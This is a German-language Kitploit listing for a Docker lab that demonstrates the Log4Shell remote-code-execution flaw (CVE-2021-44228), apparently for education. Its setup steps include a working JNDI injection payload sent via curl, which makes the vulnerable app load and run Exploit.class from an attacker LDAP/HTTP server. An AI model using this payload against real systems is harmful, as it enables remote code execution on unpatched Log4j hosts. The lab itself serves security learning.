Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44228_Log4Shell — Docker-basierte RCE-Exploit-Demo für Log4Shell (CVE-2021-44228) mit verwundbarer Spring Boot App, bösartigem LDAP-Server und Payload-Zustellung via JNDI-Injection. | Kitploit
Tools/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Docker-basierte RCE-Exploit-Demo für Log4Shell (CVE-2021-44228) mit verwundbarer Spring Boot App, bösartigem LDAP-Server und Payload-Zustellung via JNDI-Injection.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Demo Exploit der Log4Shell-Schwachstelle (CVE-2021-44228)

Dieses Projekt simuliert ein RCE-Angriffsszenario über die Log4Shell-Schwachstelle in der Apache Log4j 2-Bibliothek.

Komponenten

  1. vulnerable-app: Eine Spring Boot-Anwendung, die Log4j 2.14.1 verwendet.
  2. attacker: Enthält einen bösartigen LDAP-Server (marshalsec) und einen HTTP-Server, der die Schadcode-Datei Exploit.class bereitstellt.

Durchführung

1. Umgebung starten

Voraussetzung: Docker und Docker Compose müssen installiert sein.

root@kitploit:~
docker compose up --build

Warten, bis beide Container bereit sind. vulnerable-app läuft auf Port 8080.

2. Angriff ausführen

Öffnen Sie ein neues Terminal und senden Sie eine Anfrage mit dem JNDI-Payload im Header X-Api-Version:

root@kitploit:~
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. Ergebnis überprüfen

  • Überprüfen Sie die Logs des Containers vulnerable-app. Sie sehen die Protokollierung des Payloads.
  • Überprüfen Sie die Logs des Containers attacker. Sie sehen, dass die LDAP-Verbindung zum HTTP-Server umgeleitet wurde.
  • RCE bestätigen: Prüfen Sie, ob die Datei /tmp/pwned im Container vulnerable-app erstellt wurde:
root@kitploit:~
docker exec -it vulnerable-app ls -la /tmp/pwned

Wenn die Datei existiert, wurde der Schadcode Exploit.class erfolgreich ausgeführt!

Warnung

Dieses Projekt dient ausschließlich Bildungs- und Sicherheitsforschungszwecken. Es darf keinesfalls für illegale Aktivitäten verwendet werden.

Tool herunterladen